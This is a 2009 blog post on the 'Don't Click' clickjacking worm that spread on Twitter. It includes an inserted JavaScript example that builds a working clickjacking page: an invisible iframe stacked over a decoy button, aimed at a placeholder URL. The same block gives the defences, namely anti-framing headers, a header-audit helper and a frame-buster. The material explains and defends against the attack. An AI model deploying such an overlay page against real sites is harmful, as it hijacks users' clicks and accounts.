Twitter hit hard by a social engineering attack

February 12, 2009 · Security

Earlier today, Twitter was hit with a classic social engineering attack. Tweets started showing up everywhere with a simple “Don’t Click” message and a link. Being the curious human beings that we are, we couldn’t resist clicking the link. Besides, the message was coming from a friend; how could it possibly be something bad?

The link led to a page that loaded Twitter in a hidden iframe and used a bit of CSS to lay that invisible frame over what you could actually see, so when you clicked, the click landed on Twitter’s own post button and the same message went out from your account. This technique is known as clickjacking. Before long, hundreds and then thousands of these “Don’t Click!” messages were all over Twitter.
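To make the mechanism concrete, here is an added example (not code from the original post, and not Twitter’s own code) showing how such an overlay page is put together and how a site tells browsers not to let it be framed. The target URL, its `status` query parameter and the pixel offsets are assumptions for illustration, not details taken from the real attack.

```javascript
// Added example (not from the original post or from Twitter): the structure of
// a CSS/iframe clickjacking page, plus the server-side headers and client-side
// fallback that stop a page from being framed. The target URL, its "status"
// query parameter and the pixel offsets below are assumptions.

// Assumed target: a page that pre-fills its post form from a URL parameter, so
// a single click on its real submit button publishes the attacker's text.
const TARGET_URL =
  "https://example.com/home?status=" +
  encodeURIComponent("Don't Click: http://example.com/x");

// Attacker's page. The decoy button is visible; the iframe holding the target
// is stacked above it (higher z-index) but fully transparent, and shifted so
// the target's submit button lands exactly under the decoy. The victim sees
// "Don't Click" and clicks; the browser delivers that click to the frame.
function attackerPage(targetUrl, decoy = { left: 50, top: 200 }, shift = { left: -320, top: -180 }) {
  return `<!doctype html>
<html><head><style>
  #decoy  { position:absolute; left:${decoy.left}px; top:${decoy.top}px; z-index:1; }
  #victim { position:absolute; left:${shift.left}px; top:${shift.top}px;
            width:1200px; height:900px; opacity:0; z-index:2; border:0; }
</style></head><body>
  <button id="decoy">Don't Click</button>
  <iframe id="victim" src="${targetUrl}"></iframe>
</body></html>`;
}

// Server-side defence: headers that tell the browser not to render the page
// inside a frame. X-Frame-Options is the older mechanism (first shipped in
// IE8 in early 2009); CSP frame-ancestors is the standardised one and takes
// precedence when both are present. Send both to cover old browsers.
function framingProtectionHeaders() {
  return {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
  };
}

// Audit helper: given a response's headers (names in any case), decide whether
// a cross-origin attacker page could frame it. Mirrors browser behaviour: if a
// frame-ancestors directive exists it is authoritative; otherwise fall back to
// X-Frame-Options. Anything unparseable is reported as unprotected.
function isFramingProtected(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value).trim();
  }

  const csp = h["content-security-policy"] || "";
  const directive = csp
    .split(";")
    .map((d) => d.trim())
    .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
  if (directive !== undefined) {
    const sources = directive.split(/\s+/).slice(1).map((s) => s.toLowerCase());
    // 'none' or 'self' alone block the cross-origin case; any host, scheme or
    // wildcard in the list means some other origin may frame the page.
    return sources.length > 0 && sources.every((s) => s === "'none'" || s === "'self'");
  }

  const xfo = (h["x-frame-options"] || "").toUpperCase();
  return xfo === "DENY" || xfo === "SAMEORIGIN";
}

// Client-side fallback for browsers that honour neither header. The page is
// hidden by default and only revealed when it is the top-level document; a
// bare "if (top != self) top.location = self.location" can be neutralised by
// a hostile parent, so hiding first is what makes this fallback useful.
function legacyFrameBuster() {
  return `<style id="anti-clickjack">body { display: none !important; }</style>
<script>
  if (self === top) {
    var s = document.getElementById("anti-clickjack");
    s.parentNode.removeChild(s);
  } else {
    top.location = self.location;
  }
</script>`;
}
```

Save `attackerPage(TARGET_URL)` to a file and open it to see the decoy; if the target sends `framingProtectionHeaders()`, the frame stays blank and the click does nothing. `isFramingProtected` is the check to run against your own responses: a `frame-ancestors` list that names any host other than `'self'` is reported as unprotected, because that host can do exactly what the page above does.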

[Image: dontclick-jkottke]

The simplicity of this attack is quite genius. It is almost entirely self-replicating: every victim becomes the next sender, and for everyone who saw the message, it came from someone who was a “friend”.

This really is social engineering at its best. When you get one of those emails from someone in Nigeria offering to share their riches with you, if only you’ll send money for the bank fees, most of us know not to trust something like that from a complete stranger. But when it comes from someone we know, even in the casual sense of “knowing” someone online, we are much more likely to trust the source. We’re just lucky the payload was a harmless message; the same hijacked click could have posted anything the attacker chose.

Ironically enough, I didn’t fall prey to this attack, but only because I was stuck in an all-day training class on web security.
